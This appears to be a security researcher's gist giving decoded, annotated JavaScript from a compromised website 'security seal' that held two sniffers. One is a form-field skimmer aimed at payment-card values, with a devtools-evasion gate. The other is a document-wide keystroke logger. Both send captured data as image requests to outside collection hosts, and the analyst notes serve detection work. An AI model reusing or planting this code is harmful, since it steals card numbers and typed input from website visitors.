@gwillem
Last active March 2, 2022 17:32
BestOfTheWeb.com Security Seal contains not just one but two different keystroke sniffers (2019-05-13) -- obfuscated version here: https://urlscan.io/responses/5c4474793baf83d5376045163d77f8f2ecd228ba5941ee8572489cb475a3cd1b/
// Analyst annotation: shared state for the first sniffer (a form-field skimmer).
// The code is kept exactly as decoded so it can still be matched against captures.
var sniffData = {};
// Collection endpoint; GetImageUrl() appends '?reff=<payload>' to it.
// IoC (defanged): font-assets[.]com/img
sniffData['Gate'] = 'https://font-assets.com/img';
// Captured form values, keyed by the field's id or name (filled by SaveParam).
sniffData['Data'] = {};
// Hashes of payloads already sent; SendData() uses them to avoid duplicate requests.
sniffData['Sent'] = [];
// `![]` evaluates to false. SaveParam() sets the flag to true once a value passes
// its two checks; nothing in this listing sets it back to false.
sniffData.IsValid = ![];
/**
 * Stores one form field's current value in sniffData.Data.
 *
 * The key is field.id when it is non-empty, otherwise field.name. Only values of
 * 1 to 255 characters are kept (0x100 === 256).
 *
 * NOTE(review): _0x5e7b89, _0x5c4ab6 and _0xdc5c77 are not defined in this listing.
 * From the call shape, _0x5e7b89(value, '-', '') looks like a replace-all helper that
 * strips dashes and then spaces, and the two predicates presumably test whether the
 * result looks like a payment-card number -- confirm against the obfuscated original.
 *
 * @param {Element} field - an input, select or textarea element from the page.
 */
sniffData.SaveParam = function(field) {
if (field.id !== undefined && field.id != '' && field.id !== null && field.value.length < 0x100 && field.value.length > 0x0) {
// Both predicates passing arms the exfiltration gate (`!![]` is true).
if (_0x5c4ab6(_0x5e7b89(_0x5e7b89(field.value, '-', ''), ' ', '')) && _0xdc5c77(_0x5e7b89(_0x5e7b89(field.value, '-', ''), ' ', ''))) sniffData.IsValid = !![];
// The value is stored whether or not the predicates passed.
sniffData.Data[field.id] = field.value;
return;
}
// Same logic, keyed by field.name, for fields that did not qualify via id.
if (field.name !== undefined && field.name != '' && field.name !== null && field.value.length < 0x100 && field.value.length > 0x0) {
if (_0x5c4ab6(_0x5e7b89(_0x5e7b89(field.value, '-', ''), ' ', '')) && _0xdc5c77(_0x5e7b89(_0x5e7b89(field.value, '-', ''), ' ', ''))) sniffData.IsValid = !![];
sniffData.Data[field.name] = field.value;
return;
}
};
/**
 * Snapshots every <input>, <select> and <textarea> in the document by passing
 * each element to SaveParam().
 *
 * No filter on input type is applied here, so hidden and password inputs are
 * captured as well.
 */
sniffData.SaveAllFields = function() {
var inputfields = document.getElementsByTagName('input');
var selectfields = document.getElementsByTagName('select');
var textareas = document.getElementsByTagName('textarea');
for (var i = 0; i < inputfields.length; i++) sniffData.SaveParam(inputfields[i]);
for (var i = 0; i < selectfields.length; i++) sniffData.SaveParam(selectfields[i]);
for (var i = 0; i < textareas.length; i++) sniffData.SaveParam(textareas[i]);
};
/**
 * Serialises the collected fields and hands them to LoadImage(), unless the same
 * payload was already sent.
 *
 * Runs only when window.devtools.isOpen is falsy and sniffData.IsValid is true.
 * NOTE(review): window.devtools is not defined in this listing; it presumably comes
 * from a devtools-detection helper in the original script, which would make this an
 * analysis-evasion gate -- confirm against the obfuscated original.
 *
 * Payload format (useful when decoding captured traffic):
 *   encodeURIComponent(base64(JSON.stringify(Data))), with Data.Domain set to
 *   location.hostname.
 */
sniffData['SendData'] = function() {
if (!window.devtools.isOpen && sniffData.IsValid) {
// Tag the record with the site it was taken from.
sniffData.Data.Domain = location.hostname;
var _0x43c1ef = encodeURIComponent(window.btoa(JSON.stringify(sniffData.Data)));
// hashCode() is not a built-in String method; it must be added elsewhere in the
// original script (not visible here).
var _0x2c70f7 = _0x43c1ef.hashCode();
// Skip payloads whose hash is already recorded in Sent. A changed field value
// yields a new payload, so each distinct form state is sent once.
for (var _0x3cbd0c = 0x0; _0x3cbd0c < sniffData.Sent.length; _0x3cbd0c++)
if (sniffData.Sent[_0x3cbd0c] == _0x2c70f7) return;
sniffData.LoadImage(_0x43c1ef);
}
};
/**
 * One polling tick: re-read all form fields, then attempt to send them.
 * Registered as the setInterval callback by the onreadystatechange handler.
 */
sniffData.TrySend = function() {
sniffData.SaveAllFields();
sniffData.SendData();
};
/**
 * Sends the payload as an image request.
 *
 * Records the payload's hash in sniffData.Sent, then creates an IMG element and
 * assigns its src. The element is never attached to the DOM in this code; assigning
 * src is enough for the browser to issue the GET request.
 *
 * Defender note: this traffic is an image load, so it is governed by the CSP
 * `img-src` directive rather than `connect-src`.
 *
 * @param {string} _0x3e43b7 - the encoded payload built by SendData().
 */
sniffData.LoadImage = function(_0x3e43b7) {
sniffData.Sent.push(_0x3e43b7.hashCode());
var _0x2d7e85 = document.createElement('IMG');
_0x2d7e85.src = sniffData.GetImageUrl(_0x3e43b7);
};
/**
 * Builds the request URL: sniffData.Gate + '?reff=' + payload.
 * The `reff` query parameter on the Gate host is the network signature of this sniffer.
 *
 * @param {string} _0x51c1cf - the encoded payload.
 * @returns {string} the full URL requested by LoadImage().
 */
sniffData.GetImageUrl = function(_0x51c1cf) {
return sniffData.Gate + '?reff=' + _0x51c1cf;
};
// Entry point of the first sniffer: once the document has finished loading, poll
// the form fields every 0x1f4 (500) ms via TrySend().
// Assigning document.onreadystatechange replaces any handler the page had set on
// that property.
document.onreadystatechange = function() {
if (document.readyState === 'complete') {
window.setInterval(sniffData.TrySend, 0x1f4);
}
}
// (c) Decoded by Sanguine Security
// Analyst annotation: state for the second, independent sniffer (a raw key logger).
// Buffer of characters typed since the last send.
var keystrokes = '';
// Collection endpoint; the buffered characters are appended after 'c='.
// IoC (defanged): dt2td[.]com/jsk/imgtrack.php?c=
var sniffURL = 'https://dt2td.com/jsk/imgtrack.php?c=';
// Document-wide keypress handler: converts each key event to a character and
// appends it to the `keystrokes` buffer. It is not tied to any particular form field.
// `get` and `key` are assigned without a declaration, so in non-strict code they
// become properties of the global object.
document.onkeypress = function (keypress) {
// Prefer the legacy global window.event when present, else the handler argument.
get = window.event ? event : keypress;
key = get.keyCode ? get.keyCode : get.charCode;
key = String.fromCharCode(key);
keystrokes += key;
};
// Flush loop for the key logger. No delay argument is passed to setInterval, so the
// callback runs at the browser's default/minimum timer interval.
// When the buffer is non-empty it is sent as an image request
// (sniffURL + keystrokes) and then cleared. This code does not encode the
// characters before appending them to the URL.
window['setInterval'](function () {
if (keystrokes.length > 0) {
new Image()['src'] = sniffURL + keystrokes;
keystrokes = '';
}
})